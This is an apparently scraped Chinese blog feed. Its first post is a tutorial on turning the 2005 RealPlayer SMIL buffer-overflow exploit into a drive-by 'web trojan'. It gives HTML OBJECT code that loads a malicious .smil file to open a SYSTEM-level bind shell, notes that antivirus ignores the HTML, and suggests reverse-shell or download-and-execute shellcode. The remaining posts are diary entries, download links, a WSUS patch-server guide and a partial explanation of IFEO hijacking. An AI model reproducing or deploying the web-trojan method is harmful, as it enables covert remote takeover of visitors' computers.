2005年3月份，REALPLAYER暴出安全漏洞，大体意思是：RealPlayer事一款媒体播放器。使用者可以以基于缓冲区溢出脆弱用协调的多媒体综合语言(smil)文件形式语法分析程序，这能允许一个存心不良的攻击者在一台脆弱的机器上运行任意的代码。受影响系统： Windows RealPlayer 10.5 (6.0.12.1040-1056)、Windows RealPlayer 10 、Windows RealOne Player v2 (6.0.11.853 - 872) 、 Windows RealOne Player v2 (6.0.11.818 - 840) 、Windows RealOne Player v1 、Windows RealPlayer 8 、Windows RealPlayer Enterprise 、Mac RealPlayer 10 (10.0.0.305 - 325) 、Mac RealOne Player 、Linux RealPlayer 10 、Linux Helix Player。从这个漏洞的描述上来看，也会明白这个网页木马的可怕之处。
恶意的smil文件生成器，网上有现成的代码。
如图1所示，我用编译好的real.exe生成了1个1.smil文件。
我本机装有暴风影音，打开这个1.smil，如图2所示。此时我本机就会开13579端口。netstat -an来看一下，再telnet本机13579端口试试，成功！如图3、图4所示。注意在图4中执行命令的时候，并没有回显，打完命令运行后才能看到结果的，是系统权限的。
这个漏洞的利用方法大体就是这个样子。我们现在就是利用此漏洞来制做成网页木马，让用户打开网页后就会打开本机的13579端口。其实说白了，也就是如何在网页中调用生成的smil文件。什么是smil文件呢？也就是replayer连续播放影音文件的一种调用方法。举个简单的例子，如果想连续播放两首 mp3，网页代码如下：  
★
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">
<PARAM NAME="_ExtentX" VALUE="9313">
<PARAM NAME="_ExtentY" VALUE="1588">
<PARAM NAME="AUTOSTART" VALUE="-1">
<PARAM NAME="SHUFFLE" VALUE="0">
<PARAM NAME="PREFETCH" VALUE="0">
<PARAM NAME="NOLABELS" VALUE="0">
<PARAM NAME="SRC" VALUE="Real.smil">
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">
<PARAM NAME="CONSOLE" VALUE="Clip">
<PARAM NAME="LOOP" VALUE="1">
<PARAM NAME="NUMLOOP">
<PARAM NAME="CENTER">
<PARAM NAME="MAINTAINASPECT" VALUE="0">
</OBJECT>  
============================请把以上内容保存成htm或html文件
Real.smil文件的内容：
<smil>
<head>
<layout>
<region id="oRegion" left="0" top="0" />
</layout>
</head>
<body>
<seq>
<video region="oReal" src="001.mp3" />
<video region="oReal" src="002.mp3" />
</seq>
</body>
</smil>
============================001.mp3和002.mp3（或其它媒体格式）与你保存的htm文件还有Real.smil放在同一目录下
★
根据我以上的代码做完后，你再用网页打开你做好的htm文件就可以在网页中调用一些影音播放器播放001.mp3和002.mp3了。那有了这么多的代码与理论基础了，你会做网页木马了吗？做网页木马就简单多了，怕菜鸟还是不明白，再写一次代码吧：
★
===========REALPLAYER 网页木马代码开始==============================
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">
<PARAM NAME="_ExtentX" VALUE="9313">
<PARAM NAME="_ExtentY" VALUE="1588">
<PARAM NAME="AUTOSTART" VALUE="-1">
<PARAM NAME="SHUFFLE" VALUE="0">
<PARAM NAME="PREFETCH" VALUE="0">
<PARAM NAME="NOLABELS" VALUE="0">
<PARAM NAME="SRC" VALUE="你用real.exe生成的恶意smil文件的名字，如1.smil">
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">
<PARAM NAME="CONSOLE" VALUE="Clip">
<PARAM NAME="LOOP" VALUE="1">
<PARAM NAME="NUMLOOP">
<PARAM NAME="CENTER">
<PARAM NAME="MAINTAINASPECT" VALUE="0">
</OBJECT>  
===========REALPLAYER 网页木马代码结束==============================
★
方法就是这样简单，一个htm文件加一个恶意的smil文件就全部结束了。如果你想把网页木马改成反弹端口或下载执行exe的，那就要看你构造恶意的 smil文件的shellcode水平了。我这里只是提供了一个思路，至于如何完美打造这个REALPLAYER 网页木马，大家各自研究吧。你也要可以用我的思路，利用非安全6期陈莎莎的那篇文章制作的恶意rm文件改成网页调用的方式，估计也会这功。而且，这都是正常的htm代码，杀毒软件不会去杀这段htm代码的。另外，附个小知识，REALPLAYER的网页参数：
★
一些REAL文件参数：
AUTOSTART 自动播放：true|false 默认：false  
CENTER 放在中间位置 true|false 默认：false  
CONSOLE 连接多种格式 name, _master, or _unique 默认：无  
CONTROLS 播放面板的按钮和MTV、电影窗口按钮的名字(PlayButton,PlayOnlyButton,StopButton,FFCtrl, RWCtrl,MuteCtrl,VolumeSlider,ImageWindow ) 默认：全部按钮  
HEIGHT 高度,单位是百分比或者象素,默认：0
WIDTH 宽度,单位是百分比或者象素,默认：0
LOOP 自动重放 true|false 默认：false  
MAINTAINASPECT 预留图象窗口. true|false 默认：false  
NOJAVA 防止JVM跳出来. no true|false 默认：false  
NOLABELS 不显示播放器的一些信息true|false 默认：false  
NOLOGO 不显示Real的LOGO true|false 默认：false //Real很霸道这句我从来没有改成过，你怎么改还是认为是 true
NUMLOOP 指定某段片段的反复播放 any number 默认：无  
REGION 绑定SMIL区域. SMIL region 默认：无  
SHUFFLE 随机播放某段 true|false 默认：false
SRC 文件连接地址  
BACKGROUNDCOLOR 背景颜色：颜色的英文名或者RGB数值 默认：黑色
]]> 2008-01-21 14:10:07 http://86wf.mytupa.com/blog/view.php?id=3be4eb54f1134261cdacf64b807baa42 http://www.bigupload.com/d=DNXV39TWWZ
MD5：f9d7644d874f1fee78f6a15cd40a1168
文件名：如何添加打印机.rar
文件大小：2.72MB

第一次做,请大家多多关照.有意见就提,嘿嘿

如何下载到真正的东西
http://www.bigupload.com/d=ULAYF842UD
MD5：4d8743fa79953981d740a30713947a73
文件名：如何下载到真正的东西.rar
文件大小：7.79MB

Autorun病毒的解析防范
http://www.bigupload.com/d=SKDBCOL95B
MD5：77ca165a6142fb0e3c311f109bac6817
文件名：autorun病毒的解析防范.rar
文件大小：14.1 MB 




PS：网站现在存放只能存放30天。上面的视频全部消失了。。。我的心血。。哎]]> 2008-01-11 10:41:39 http://86wf.mytupa.com/blog/view.php?id=70face07017db2c71969126907ffbc75 发表时间：2005年6月26日 8时57分1秒     
爱一个的感觉
  这几天常在网上泡着,看着各种各样的小说,当看到(那夜花开)时,终于感觉到了爱一个的感觉是什么了?
  爱上了一个人,就要为她付出一切;
  爱上了一个人,就要想到一切后果;
  爱上了一个人,就不要想什么回报.
 

关于大学
发表时间：2005年6月28日 19时32分36秒       
关于大学
    快一年了,大学还是没感觉,快考试了才感觉到大学的不同！
　　期末才是大学的独到之处，搞得人还要通宵看书！
　　快一年了，啥东西都没学到，只感觉多了一点见识，这可能就是大学！ 


8.18开学 回家了，不上网了！
发表时间：2005年7月4日 9时7分45秒       
8.18开学 回家了，不上网了！
这几天要考试了，好久不上网了，有人找我有事的，给我留言在QQ上，我过几天会上来看一下，回家只有几天的时间，也上不了网了，真没意思，考试了！哈哈！ 


7.8去绵阳，可能在8月初回家！
发表时间：2005年7月7日 22时30分40秒      
7.8去绵阳，可能在8月初回家！
考试完了，不知道咋样，但愿不挂！ 



24去成都白天挂Q不要留言，晚上在！
发表时间：2005年7月10日 19时27分49秒        
24去成都白天挂Q不要留言，晚上在！
绵阳给人的感觉还可以，卫生！可就是实习太难了点！ 


以后，少上网了，回家了！
发表时间：2005年7月23日 21时33分19秒      
以后，少上网了，回家了！
在绵阳还好
 

到成都了!!哈哈
发表时间：2005年7月24日 14时41分20秒      
到成都了!!哈哈
在绵阳的日子过得还好,那的条件可以,天气也好! 


27回家了!!!
发表时间：2005年7月25日 15时7分43秒       
27回家了!!!
27号回家,哈哈! 



15号去重庆！
发表时间：2005年8月7日 13时57分42秒       
15号去重庆！
可能16号走，有车票的话！ 

到学校了17号
发表时间：2005年8月18日 19时0分26秒        
到学校了17号
520520 


这几天军训没时间上网
发表时间：2005年8月29日 12时55分10秒        
这几天军训没时间上网
太累 

军训完了
发表时间：2005年9月3日 12时40分0秒       
军训完了
哈 


机房不开门，我就不上网，哈哈
发表时间：2005年9月11日 6时17分5秒        
机房不开门，我就不上网，哈哈
机房不知道什么时候才开呀！？？？ 


应该可以天天上网了
发表时间：2006年2月16日 0时48分57秒      
应该可以天天上网了
房子的事情基本上定了，以后应该天天在网上了，有事在QQ上留言，出于一些原因，本人多数是隐身 


大学一半了总结一下吧
发表时间：2006年2月16日 3时58分19秒        
大学一半了总结一下吧
通宵不想做其他的，哎，也像老图学学，写个总结吧！
    大学也过了一半了，如果说准点，就是过了一大半了！
    从大一来的时候，什么都不知道，通宵不敢，上网不常，没上课的时候上上自习；上课的时候好好听听。大一下半学期，熟悉了大学，也熟悉了周围环境，没上课的时候可以去上上网了，为了少在外面去，少用点钱买了电脑；上课的时候也开始睡睡觉了。大二了，对大学就更看得清了，通宵正常，逃课也开始了，上课睡觉还是一样的，上网成了生活不可缺少的一部分。
    大一的时候，没事，无耻，郁闷，高兴的时候都去喝一杯。大二了对喝酒没感觉了，时不时喝点，但已经不是以前那感觉了，就像是喝酒成了生活的一部分一样，大一的时候却有点像和情人偷情那种偷偷摸摸的样子。
    大一对以后还有着很好的想法，想着毕业了可以找个好工作，想着大学能学到很多知道；但大二了可能是长大了吧，知道毕业了工作不好找了，知道大学在教室学不到多少知识了；大三的时候又该怎样想呢？
    大学这一半过得感觉就像高中一样的心情，刚来的时候心里想得是那么的好，但在学校久了才知道现实是那样的.......
    一半过去了，自己学到什么了？想想看，也没学到什么，知识没学到多少，但在另一方面来说，这一半应该是为以后出社会打下了一小点基础吧！
    有人说在大学看的是能力不是成绩，但自己有能力吗？想了一想并没有什么能力，成绩就更不要说了，总的来说这一半是浪费过去了。
    但愿下一半应该比这一半好吧！（真不是写东西的料呀，哎，写的真烂） 



能让我想起很多....虽然以前没写日记的习惯,但还是记录了一些事情.
]]> 2008-01-07 16:47:30 http://86wf.mytupa.com/blog/view.php?id=421b4c0f3ab2d5406efb57f3040c4c0c    http://www.bigupload.com/d=DL6Z64N35J
二.构建内部网卡巴斯基升级服务
   http://www.bigupload.com/d=BSYUIY37GR
三.破解加密文件夹的工具
   http://www.bigupload.com/d=T1M6AYD68E
四.网站图片嗅探下载工具
   http://www.bigupload.com/d=A30II772HS
五.录像工具
   http://www.bigupload.com/d=YH452NPCCB
六.100个左右的smalltool
   http://www.bigupload.com/d=P4EQLVIPLT
七.flv文件嗅探下载工具 
   http://www.bigupload.com/d=6P4LNQ4AW8
八.蓝黑英雄传电子杂志
   http://www.bigupload.com/d=U1OJSVHKKT
9.国米100年资料统计
   http://www2.bigupload.com/download_frame.php?id_file=XH8TVGSO4E
   http://www.bigupload.com/code.php?code=2XF9TRGTEY
10.科来软件网络通讯协议图
   http://www.bigupload.com/code.php?code=AL2PWN8MZG
11.smalltool后来的
   http://www.bigupload.com/code.php?code=G49T0KKF49
148个童话故事MP3
1 童话寓言 阿拉丁神灯
2 童话寓言 阿里巴巴
3 童话寓言 阿里巴巴和四十大盗
4 童话寓言 啊孩子
5 童话寓言 艾丽思漫游记
6 童话寓言 爱幻想的狗
7 童话寓言 爱丽丝漫游仙境
8 童话寓言 八只小金龟
9 童话寓言 拔萝卜
10 童话寓言 白雪公主
11 童话寓言 白云
12 童话寓言 报恩的白鸽
13 童话寓言 北风和太阳
14 童话寓言 北风爷爷
15 童话寓言 被处决的前夜

16 童话寓言 笨狮子
17 童话寓言 冰棍变魔术
18 童话寓言 拨萝卜
19 童话寓言 不工作的猫
20 童话寓言 不光彩的亚军
21 童话寓言 不可电议的鼓
22 童话寓言 不可思议的鼓
23 童话寓言 小猫刷牙
24 童话寓言 不怕冷的大衣
25 童话寓言 不听话的小孩
26 童话寓言 不用嘴巴唱歌的歌手
27 童话寓言 采蘑菇的小兔子
28 童话寓言 差得多
29 童话寓言 长发妹
30 童话寓言 长袜子皮皮

31 童话寓言 长着“高鼻子”的新锅子
32 童话寓言 唱歌比赛
33 童话寓言 城里老鼠和乡下老鼠
34 童话寓言 吃葡萄
35 童话寓言 丑小鸭
36 童话寓言 厨房里的争论
37 童话寓言 聪明的阿凡提
38 童话寓言 聪明的小牧人
39 童话寓言 聪明的小鸭子
40 童话寓言 答案
41 童话寓言 打喷嘴的帽子
42 童话寓言 大力士
43 童话寓言 大乌龟
44 童话寓言 大象滑梯过生日
45 童话寓言 荡秋千

46 童话寓言 等明天
47 童话寓言 第三幅画
48 童话寓言 东郭先生
49 童话寓言 动物盖房子
50 童话寓言 肚子里的酒厂
51 童话寓言 飞上树的乌龟
52 童话寓言 风筝找朋友
53 童话寓言 蛤蟆旅行家
54 童话寓言 龟兔赛跑
55 童话寓言 鬼婆婆
56 童话寓言 哈蟆旅行家
57 童话寓言 海的女儿
58 童话寓言 懒人卖驴
59 童话寓言 狼和七只小山羊
60 童话寓言 狼来了

61 童话寓言 老虎和青蛙
62 童话寓言 老虎外婆
63 童话寓言 老鼠嫁女儿
64 童话寓言 梨子提琴
65 童话寓言 萝卜回来了
66 童话寓言 买画
67 童话寓言 卖火柴的小女孩
68 童话寓言 美女与怪兽
69 童话寓言 魔力公主
70 童话寓言 母鸡生的怪孩子
71 童话寓言 木偶奇遇记
72 童话寓言 能吃的宫殿
73 童话寓言 年画上的牧童
74 童话寓言 鸟树
75 童话寓言 牛伯伯种菜

76 童话寓言 胖嫂
77 童话寓言 捧着空花盆的孩子
78 童话寓言 屁媳妇
79 童话寓言 七色花
80 童话寓言 七兄弟
81 童话寓言 桥要跨了
82 童话寓言 巧儿姑娘
83 童话寓言 青蛙王子
84 童话寓言 三个和尚
85 童话寓言 三只熊
86 童话寓言 神画
87 童话寓言 神鸟
88 童话寓言 生日快乐
89 童话寓言 谁的小手帕
90 童话寓言 谁的嘴巴好

91 童话寓言 谁看见小星星
92 童话寓言 谁偷的钱
93 童话寓言 睡不着的小玛丽
94 童话寓言 睡美人
95 童话寓言 司马光救小朋友
96 童话寓言 太阳变魔术
97 童话寓言 太阳以东和月亮以西
98 童话寓言 桃树下的小白兔
99 童话寓言 听话的小孩
100 童话寓言 头发树
101 童话寓言 湾湾桥
102 童话寓言 碗豆上的公主
103 童话寓言 为什么猴子的屁股是红的
104 童话寓言 尾巴
105 童话寓言 蚊子坏蛋哪里逃

106 童话寓言 我知道
107 童话寓言 梧桐树换衣服
108 童话寓言 五小象
109 童话寓言 夕阳箫鼓
110 童话寓言 下金蛋的鸡
111 童话寓言 仙女
112 童话寓言 消失在迷雾中的兵团
113 童话寓言 小公鸡和小鸭子
114 童话寓言 小公鸡学吹喇叭
115 童话寓言 小红帽
116 童话寓言 小黄莺唱歌
117 童话寓言 小桔花
118 童话寓言 小蝌蚪吃尾巴
119 童话寓言 小老鼠变大老虎
120 童话寓言 小铃铛的故事

121 童话寓言 小马过河
122 童话寓言 小猫不工作
123 童话寓言 小猫钓鱼
124 童话寓言 小猫学本领
125 童话寓言 小人国
126 童话寓言 小水桶
127 童话寓言 小兔乖乖
128 童话寓言 小熊拔牙
129 童话寓言 小熊请客
130 童话寓言 小鸭得救了
131 童话寓言 幸福人的衬衣
132 童话寓言 熊
133 童话寓言 雪房子
134 童话寓言 雪姑娘
135 童话寓言 雪花

136 童话寓言 野天鹅
137 童话寓言 一起玩
138 童话寓言 一千里车和五百里车
139 童话寓言 一只笨狼
140 童话寓言 邮递员的童话
141 童话寓言 渔夫和金鱼的故事
142 童话寓言 雨滴项链
143 童话寓言 照井
144 童话寓言 猪八戒吃西瓜
145 童话寓言 做风车的故事
146 童话寓言 大狼
147 童话寓言 豆孩子
148 童话寓言 勇敢的小裁缝

http://www.baoby.com/mp3/thuayyan/1.mp3

http://www.baoby.com/mp3/thuayyan/2.mp3
.........中间的自己加吧.............
http://www.baoby.com/mp3/thuayyan/148.mp3]]> 2008-01-07 15:30:04 http://86wf.mytupa.com/blog/view.php?id=540292b914effd2e110680cb4d6574ba 2005-10-28   作者:BitsCN整理   来源:中国网管联盟   PV:4262
关键词:补丁 服务器 升级 局域网 更新 WSUS 下载 安装 设置

　　如果不及时安装操作系统的补丁，会带来什么后果呢?冲击波、震荡波的厉害之处，想必大家都领教过了。因此及时更新操作系统的漏洞补丁，目前已成为提高系统安全性的主要手段。
　　
　　然而，你会发现使用Windows自带的Update下载补丁，速度比较慢。如果你所在的公司内网中的员工计算机不能上网，你又该如何为大家打补丁呢?恐怕使用默认的Update是无法实现的吧。
　　
　　现在，我们可以利用微软提供的WSUS(Windows Server Update Services)建立一个内部Update服务器，让公司内网中的计算机直接到这台Update服务器上下载补丁，以缩短用户打补丁的时间，及时提高计算机和网络的安全性。没有连接Internet的计算机只要在内网中能顺利访问Update服务器，也可实现随时打补丁，有效地防止漏洞型病毒在内网传播。
　　
　　了解:走近WSUS
　　
　　软件全称:Windows Server Update Services
　　
　　软件版本:2.0正式版
　　
　　软件平台:Windows 2000/2003
　　
　　下载地址:http://download.microsoft.com/download/9/3/3/933eaf5d-f2a2-4a03-8a87-e8f6e6d07e7f/WSUSSetup.exe bbs.bitsCN.com
　　
　　WSUS(Windows Server Update Services)是微软公司继SUS(Software Update Service)之后推出的替代SUS的产品，目前版本为2.0。使用过SUS的网管都知道，虽然可用它建立自动更新服务器，不过配置很麻烦，更新补丁的产品种类也较少，同时在实际使用中经常会因为网络带宽拥堵而造成客户机升级失败。那么WSUS具有哪些特性呢?
　　
　　●支持对更多微软产品进行更新，除了Windows外，Office、Exchange、SQL等产品的补丁和更新包都可通过WSUS发布，而SUS只支持Windows系统。
　　
　　●提供了中文操作界面，以前的SUS操作界面为英文，不便于操作。
　　
　　●比SUS更好地利用了网络带宽。
　　
　　●对客户机的管理更强大，可针对不同客户机分配不同的用户组，并分配不同的下载规则。
　　
　　●在设置和管理上比SUS更简单直观。
　　
　　硬件要求:如果网络中要升级的客户端计算机少于500台，那么架设WSUS服务器的硬件至少得是750MHz主频的处理器以及512MB内存，当然还需要充足的硬盘空间来保存更新程序的安装文件。
　　
　　实战:部署WSUS 中国网管联盟
　　
　　笔者所在公司的网络处于教育网之中，客户机连接微软官方的Update站点速度很慢，更新补丁的时间较长。为了提高公司网络的安全，加快补丁更新速度，笔者打算选择一台服务器通过WSUS建立一个公司内部的Update站点，让所有员工计算机到这个Update站点更新补丁，服务器名称为softer。
　　
　　准备工作:由于软件需要很多必备组件，如果在Windows 2000 Server上安装WSUS则需要安装这些组件，不过这些组件都是默认安装在Windows 2003上的，所以笔者建议大家使用Windows 2003部署WSUS服务器，同时建议大家不要在该服务器上安装其他Web网站。
　　
　　1.安装WSUS
　　
　　安装WSUS之前，先要保证WSUS必需的硬件条件，还要安装相应的组件，如IIS等。
　　
　　在Windows 2003中没有启用IIS服务，所以我们需要安装“应用程序服务器”组件，并把IIS添加到本地计算机。下载WSUS并双击安装程序，程序将会自动解压缩。 bitscn.com
　　
　　现在，开始安装WSUS，所有步骤和安装普通软件一样。在出现选择安装路径的界面时，需要注意的是，安装空间必须要有6GB，而且所在驱动器必须是NTFS格式的文件系统。
　　
　　如果大家的Windows 2003中没有安装SQL Server，那么该软件还会在计算机上安装SQL Server桌面版。
　　
　　在网站选择窗口，选择“使用现有IIS默认网站”即可，如果本地计算机还开启了其他站点服务。由于架设的是独立的升级服务器而不是其他服务器的镜像站点，所以在“镜像更新设置”中不用进行选择。现在，开始在本地计算机上安装WSUS。
　　
　　2.设定补丁类型
　　
　　由于微软的产品很多，我们不可能对它的所有产品都进行更新，所以需要根据公司的实际情况对补丁的类型进行设置。
　　
　　WSUS安装完毕后，打开浏览器，使用地址http://localhost/wsusadmin访问WSUS的管理界面，也可直接输入计算机名或IP 地址进行访问，在这里笔者输入http://softer/wsusadmin进行访问。输入Windows 2003系统的管理员账户和密码即可成功登录WSUS服务器。 中国网管联盟
　　
　　第一次成功登录WSUS的界面后，会在下方“待做事项列表”中看到“同步服务器，现在就开始”的提示信息(图1)，点击该选项开始设置WSUS。
　　
　

　　
　　在同步选项设置界面，供我们设置的参数较多，由于篇幅有限这里不详细讲解了。平常用到最多的是“计划”下的“手动同步”或“每天定时同步”，一般情况下设置为“每天定时同步”。另外还有“产品和分类”下方的设置，我们可以在产品处选择可供更新的产品种类，除了Windows外，还有Office、 Exchange、SQL等产品的补丁和更新包都可以通过WSUS发布。在“更新分类”处可以详细设置提供下载的补丁类别(图2)。
　　
　


　　
　　设置“产品和分类”与“更新分类”后，我们还要选择更新的语言种类，在同步选项设置界面的最下方有一个“高级同步选项”，通过它我们可以设置更新的语言为简体中文。
　　
　　至此，便完成了补丁类型及语言的设定工作，所有的前期工作已告一段落，接下来就需要对服务器和客户机进行具体操作了。 bbs.bitsCN.com
　　
　　3.下载并审批补丁
　　
　　我们如何将相应补丁从微软网站下载到服务器上供公司内部计算机更新呢?这就需要下载并审批补丁。
　　
　　在图2所示界面的左侧点击“立即同步”将启动服务器的同步功能，服务器将连接微软官方Update服务器下载相应补丁。补丁类型已经在设定补丁操作中进行了选择，服务器将只下载满足设定条件的补丁，下载的补丁供客户端使用。在下载过程中我们不能进行任何操作，只能点击“停止同步”来结束更新操作。
　　
　　大概等待2到3个小时就可完成补丁的更新，下载所用的时间是根据选择的补丁数量决定的。由于公司内网中的大部分计算机使用的都是Windows 2000操作系统，所以笔者只选择了更新Windows 2000补丁包及驱动程序。
　　
　　仅仅下载完更新包还不能提供补丁更新服务，我们还需要对刚刚下载的“安全和关键更新”进行复查和批准，经过批准的补丁才能让客户端下载(实际上批准过程就是服务器对下载补丁进行检查的过程)。在待做事项列表中点击“复查安全和关键更新”。 中国网管论坛
　　
　　在“更新”界面中可将所有补丁选中，选择完毕点击左侧“更新任务”栏中的“更改批准”，这样就会批准安装刚才下载的所有补丁。如果你不希望客户端下载某个补丁程序，则不选择该补丁(图3)。
　　

[img]http://www.bitscn.com/upimg/2006-04-13/051058_03_544.jpg[img]
　　
　　点击“更改批准”后会进入“批准更新”窗口，可在批准下拉选项中选择“安装”，然后点击“确定”。现在，所有客户端就可下载并安装刚刚批准下载的补丁程序了，至此服务器上的所有设置完毕。
　　
　　至此，服务器的设置操作就全部完成了，不过现在还要对客户端进行相应的设置，以使本来会使用Windows Update的客户端能够通过WSUS进行更新。
　　
　　4.客户端设置
　　
　　默认情况下客户机进行补丁更新都要到Windows Update站点，而我们希望将它修改为WSUS服务器的地址，因此还需要进行一些设置。
　　
　　我们需要对每一个客户端进行设置，当然设置一次即可，因为默认情况下，这些计算机都是通过微软官方的Update服务器下载补丁的，我们需要将它们的Update服务器手动修改为刚刚建立的WSUS服务器。首先，在“运行”栏中输入“gpedit.msc”启动组策略。
bbs.bitsCN.com

　　
　　提示:如果公司内部使用的是域建立的网络，那么直接在域控制器上设置组策略即可。
　　
　　依次点击“本地计算机策略→计算机配置→管理模板”，右键点击“管理模板”，选择“添加/删除模板”。通过“添加”按钮将wuau模板加入到“当前策略模板”中，添加这个模板后我们才能对Update站点信息进行修改。接着依次进入“本地计算机策略→计算机配置→管理模板→Windows组件 →Windows Update”，双击“配置自动更新”，然后选择自动更新补丁的类型，可以是手动更新也可以是自动更新。
　　
　　接着在“Windows Update”中双击“指定Intranet Microsoft更新服务位置”，将刚刚建立的WSUS服务器地址添加进来。
　　
　　最后，进入命令行模式，输入“wuauclt.exe /detectnow”命令启动更新，客户机会立刻连接WSUS服务器下载并安装补丁。在组策略的“配置自动更新”中设定自动更新让客户端定时到WSUS服务器下载补丁。
　　
　　当客户端启动了更新设置后，我们就可以在服务器上通过管理界面看到这些客户端。当然所有的补丁安装过程都是在后台进行的，我们在客户端上是不容易察觉的，要想了解客户端的补丁安装情况，只有通过服务器上的管理界面来进行查看。 
　　
　　5.部署成功
　　
　　经过以上四个步骤，WSUS的设置工作就算完成了，现在公司内部计算机都可使用配置好的WSUS服务器来更新多个微软产品的补丁，下载速度比连接官方站点快得多。而且，在实际使用过程中，我们还可通过WSUS的分组设定功能将不同用户划分到不同的更新组，从而实现公司内部计算机补丁下载的权限管理。
　　
　　自从采用WSUS搭建企业内部补丁更新平台之后，笔者发现公司员工的上网速度提高了，员工抱怨病毒骚扰的情况减少了，看来这一措施有效地防范了病毒、木马在]]> 2007-12-25 15:42:37 http://86wf.mytupa.com/blog/view.php?id=4dd16a0a444de6bdccb0b62800087c21
一. 诡异的中毒现象
在成品检验科文员办公室的一台电脑上折腾半个小时后，计算机维护部门的技术员只觉得眼皮不停狂跳，因为从刚开始接手这个任务开始，他就一直在做无用功：他随身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没，无论他直接在U盘上运行还是随便复制到哪个目录里，系统都是报告“找不到文件”或者直接没有运行起来的反应，他第一次感受到了恐惧，文件分明就好好的在眼皮底下，可它们就是“找不到”或死活不肯执行，莫非是在这台机器上被病毒破坏了？他只好打开网页尝试重新下载，但是他很快就绝望了，刚下载的查杀工具同样也不能使用。
无奈之下他只好在众多文员的期待下说出了大部分号称上门维护电脑的高手们常用的一句话，一般情况下这句话马上能让大部分用户接受残酷的现实，允许其重装系统，并为这次重装系统付出50元的价格，这句话就是：“系统文件严重损坏了，没法修了，只能重装。”
装完系统和常用办公软件后，他像一个贼似的赶紧离开了办公室，生怕多呆一会儿就会惹来什么麻烦似的，而他却不知道，“麻烦”早已在他刚才使用的U盘上安家了。回到自己的电脑前，他刚右键点击U盘，就看见鼠标忙碌的状态比平时久了点，然后托盘区里的杀毒软件和网络防火墙都消失了，他心里一慌张，赶紧运行超级巡警，系统却报告“找不到文件”，他一下子呆在了电脑前：瘟神跟上门来了……

古语云：道高一尺，魔高一丈。这句经典哲理在网络上得到了迅速的延伸应用。今年初，一种早已有之的系统调试功能被应用到病毒技术上，从而摇身一变成为恶魔的代言人，普通用户很快就面临了一场莫名其妙的病毒灾难，这就是“映像劫持”。


二. 我本将心向明月，奈何明月照……
“映像劫持”，也被称为“IFEO”（Image File Execution Options，其实应该称为“Image Hijack”，后面章节会详细提到，至少也应该称为IFEO Hijack而不是只有“IFEO”自身！），它的存在自然有它的理由，在WindowsNT架构的系统里，IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定，系统厂商之所以会这么做，是有一定历史原因的，在Windows NT时代，系统使用一种早期的堆（Heap，由应用程序管理的内存区域）管理机制，使得一些程序的运行机制与现在的不同，而后随着系统更新换代，厂商修改了系统的堆管理机制，通过引入动态内存分配方案，让程序对内存的占用更为减少，在安全上也保护程序不容易被溢出，但是这些改动却导致了一些程序从此再也无法运作，为了兼顾这些出问题的程序，微软以“从长计议”的态度专门设计了“IFEO”技术，它的原意根本不是“劫持”，而是“映像文件执行参数”！
IFEO设定了一些与堆分配有关的参数，当一个可执行程序位于IFEO的控制中时，它的内存分配则根据该程序的参数来设定，那么如何使一个可执行程序位于 IFEO的控制中呢？答案很简单，Windows NT架构的系统为用户预留了一个交互接口，位于注册表的“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options”内，使用与可执行程序文件名匹配的项目作为程序载入时的控制依据，最终得以设定一个程序的堆管理机制和一些辅助机制等，大概微软考虑到加入路径控制会造成判断麻烦与操作不灵活的后果，也容易导致注册表冗余，于是IFEO使用忽略路径的方式来匹配它所要控制的程序文件名，例如IFEO指定了对一个名为“小金.EXE”的可执行程序文件进行控制，那么无论它在哪个目录下，只要它名字还叫“小金.EXE”，它就只能在IFEO的五指山里打滚了。
说了半天都只是纯粹的概念，那么IFEO到底是怎么样发挥作用的呢？例如有一个程序文件名为“lk007.exe”，由于使用了旧的堆管理机制，它在新系统里无法正常运行甚至出现非法操作，为了让系统为其提供旧的堆管理机制，我们需要IFEO来介入，则需执行以下步骤：
1. 确保在管理员状态下执行regedit.exe，定位到以下注册表项：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
2. 在“Image File Execution Options”下建立一个子键，名为“lk007.exe”，不区分大小写。现在确保位于HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lk007.exe\下，建立一个字符串类型的注册表项，名为“DisableHeapLookAside”，值为“1”
3. 再次运行lk007.exe查看运行情况，如果真的是由于堆管理机制引发的问题，则程序得以正常运行，否则该程序问题不属于IFEO能够干涉的范围，或者需要尝试搭配其他的参数使用。

目前已知的IFEO参数有：
ApplicationGoo
Debugger
PageHeapFlags
DisableHeapLookAside
DebugProcessHeapOnly
PageHeapSizeRangeStart
PageHeapSizeRangeEnd
PageHeapRandomProbability
PageHeapDllRangeStart
PageHeapDllRangeEnd
GlobalFlag
BreakOnDllLoad
ShutdownFlags

说白了，IFEO本质是系统厂商为某些可能以早期设计模式运行的软件提供一种保全措施而设计出来的产物，并对其加以扩充形成了一套可用于调试程序的简易方案，如“BreakOnDllLoad”参数可设定在载入某个DLL时设置断点，便于程序员调试ISAPI接口；带有“Range”字样的几个参数则用于限制堆的大小等。
而里面有一个导致了今天这种局面的参数：Debugger。或许微软当初的用意是便于程序员能够通过双击某个设置了IFEO控制列表的执行体文件来直接调用调试器对其进行调试，而不用再通过繁琐的打开调试器再进行文件载入来实现调试，提高了工作效率。
为了使得IFEO能够影响到任何一个程序启动请求，NT架构中将IFEO的优先权设置得很高，基本上，当用户要求执行某个程序时，系统首先判断该程序文件是否可执行体，然后就到IFEO的入口项进行文件名配对了，直到通过IFEO这一步后，进程才真正开始申请内存创建起来。
如果系统在IFEO程序列表里匹配了当前运行的文件名，它就会读取文件名下的参数，这些参数在未被人为设置之前均有个默认值，而且它们也具备优先权， “Debugger”的优先权是最高的，所以它是第一个被读取的参数，如果该参数未被设置，则默认不作处理，如果设置了这个参数，情况就变得复杂了……


三. 罪魁祸首“Debugger”
